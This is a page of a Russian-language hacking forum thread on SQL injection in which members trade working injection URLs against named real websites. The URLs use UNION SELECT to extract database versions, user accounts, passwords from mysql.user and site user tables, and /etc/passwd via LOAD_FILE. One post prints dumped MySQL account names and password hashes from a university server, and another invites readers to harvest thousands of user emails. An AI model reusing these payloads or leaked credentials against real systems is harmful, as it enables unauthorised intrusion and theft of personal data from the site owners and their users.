SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 40 of 798
  1. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.merrell.ru/show_item.php?id=-1+union+select+1,version(),3,4/*
    правда таблицы с юзерами там вроде как нет :(
     
    #781 n1†R0x, 9 Mar 2007
    1 person likes this.
  2. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    юзеры скуля уже не в счёт? :p
    Code:
    http://www.merrell.ru/show_item.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+from+mysql.user/*
    Code:
    http://www.merrell.ru/show_item.php?id=-1+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4/*
     
    #782 ice1k, 9 Mar 2007
    2 people like this.
  3. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://www.mebelshop.kiev.ua/tovarBIG.php?tovar=-1+union+select+1,2,3,version(),5,6,user(),database(),9,10/*
    Code:
    http://www.sportshopik.ru/shop.php?GID=-1+union+select+1,2,3,4,5,concat(user(),char(58),version(),char(58),database())/*
    Code:
    http://www.ezgulik.org/news.php?id=-1+union+select+1,2,version(),user(),5,6/*
    Code:
    http://www.wnqsport.ru/showtext.php?text_id=-1+union+select+1,2,3,4,5,6/*
     
    #783 InferNo23, 9 Mar 2007
    1 person likes this.
  4. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    ещё один на 109, кажись админ один и тотже:
    Code:
    http://www.russiangps.ru/item.php?tovar_id=-1+union+select+1,USER(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9/*
    ещё парочка.
    Code:
    http://www.argo-shop.com.ua/catalog_total.php?tovar_id=-1+union+select+1,2,USER(),4,5,6,7,8,9/*
    Code:
    http://www.thb-nordis.ru/tovar.php?tovar_id=131+order+by+57/*
     
    #784 VampiRUS, 9 Mar 2007
    Last edited: 9 Mar 2007
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    забыл :D
    gz c MoA :)
     
    #785 n1†R0x, 9 Mar 2007
  6. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    PHP:
    http://region-press.ru/izd.php?id=-1+union+select+version(),2,3/*
    PHP:
    http://www.ksu.ru/tatnews.php?id=-1+union+select+1,null,3,4,user(),6,7,version(),9,10,11/*
     
    #786 Colkru, 9 Mar 2007
    Last edited: 9 Mar 2007
  7. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Газета ТРУД
    Code:
    http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,USER(),VERSION(),5,6,7/*
     
    #787 VampiRUS, 9 Mar 2007
  8. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    я выкладывал ;)
    Code:
    http://www.tajima-service.ru/index.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10/*
     
    #788 n1†R0x, 9 Mar 2007
    2 people like this.
  9. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Code:
    http://www.stjohns.hk/archive.php?id=-1+union+select+1,2,3,4,version(),6,user()/*
     
    #789 Colkru, 9 Mar 2007
    1 person likes this.
  10. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    за всём не уследишь))
    Code:
    http://www.ezgulik.org/news.php?id=-1+union+select+1,2,USER(),4,5,6/*&status=1
     
    #790 VampiRUS, 9 Mar 2007
    1 person likes this.
  11. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    PHP:
    http://net.bible.org/strong.php?id=-1+union+select+version(),null,user(),4,5,6,7,8,9,10,11,12/*
     
    #791 Colkru, 9 Mar 2007
  12. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://www.koss.ru/press.php?id=-47+UNION+SELECT+1,2,3,4,5,6--&limit=1
     
    #792 Constantine, 9 Mar 2007
    2 people like this.
  13. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    Code:
    http://mshop.po.pl.ua/phone_view.php?id=-1+UNION+SELECT+1,id,login,4,5,name,id,8,9,10,11,12,13,14,15,16,17,18,9,19,20,21+from+u sers/*
     
    #793 Dagon, 9 Mar 2007
  14. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    2Dagon
    а почему бы так не запостить? ;)
    Code:
    http://mshop.po.pl.ua/phone_view.php?id=-1+UNION+SELECT+1,null,null,null,null,null,concat(login,char(58),passw),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+users/*
     
    #794 }{0TT@БЬ)Ч, 9 Mar 2007
    1 person likes this.
  15. gormet

    gormet Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    38
    Likes Received:
    24
    Reputations:
    23
    нашел только количество столбцов, скуль кажись в utf-8.
     
    #795 gormet, 9 Mar 2007
    1 person likes this.
  16. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    _:)_
     
    #796 kamaz, 9 Mar 2007
    1 person likes this.
  17. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    Code:
    http://libweb.anglia.ac.uk/glossary.php?id=-1+union+select+null,null,concat(user,0x203a20,password),null+from+mysql.user/*
    root : *03EFB72ED8A587931B0CEB4D41C593AA3558CF48

    libweb : *ED1407E7F2EBDE6147E892938C770F674B7A63FD

    staffnet : *E04FBB23BA1A7760CBBFDFBE1A27E9DB1D682162

    login_screen : *AB77271A3BF74A173B8E634A03E39719AC00DE01

    ebooks : *997636E7EA613370DD35CD809F4C7F6F47005B86

    stats : *52DB1A5B33AF08DB2FA808A13457E2C510274574

    login_screen3 : 31ca51ec050a74a2

    login_screen2 : 453303f84c250289

    intranet : *3858D48807349812613074E76D0934B8D05AD904

    ;)
     
    #797 +StArT+, 9 Mar 2007
    1 person likes this.
  18. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://www.nowt2do.co.uk/review.php?id=-420+union+select+1,2/*

    http://www.webbusines.com.ru/review.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

    http://www.bia2.com/music-review/review.php?id=-233+union+select+1,2,3,4,5,6,7,8,9/*

    http://www.storing-zine.net/review.php?id=-106+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

    http://www.derives.net/reviews/review.php?id=-1218+union+select+1,2,3,4,5,6,7,8,9/*

    http://www.borninblood.co.uk/review.php?id=-32+union+select+1,2,3,4,5,6,7/*

    http://xbox360.themanroom.com/game-review.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

    http://securities.org.ua/securities_paper/review.php?id=322&pub=-1333+union+select+1,2,3,4,5,6,7,8,9/*

    http://www.theatreview.org.nz/reviews/review.php?id=-273+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

    http://www.webmasterlead.com/review.php?id=-338+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

    http://www.victoryzine.com/review.php?id=-559+union+select+1,2,3,4,5,6,7+from+users/*
     
    #798 SWAT, 9 Mar 2007
    3 people like this.
  19. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://e-disc.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(email,0x3a,pwd),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users+limit+17412,1+/*
    17412 юзеров) можете мыльники повыдирать, зайти в "кабинет" под чужим юзером не получается..

    /upd:
    то же самое) даже база одна
    Code:
    http://dvdguru.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(email,0x3a,pwd),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users+limit+17412,1/*
     
    #799 n1†R0x, 9 Mar 2007
    Last edited: 9 Mar 2007
    1 person likes this.
  20. gormet

    gormet Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    38
    Likes Received:
    24
    Reputations:
    23
    вот малость нашел, но не разбирал толком
     
    #800 gormet, 9 Mar 2007
(You must log in or sign up to post here.)
Page 40 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.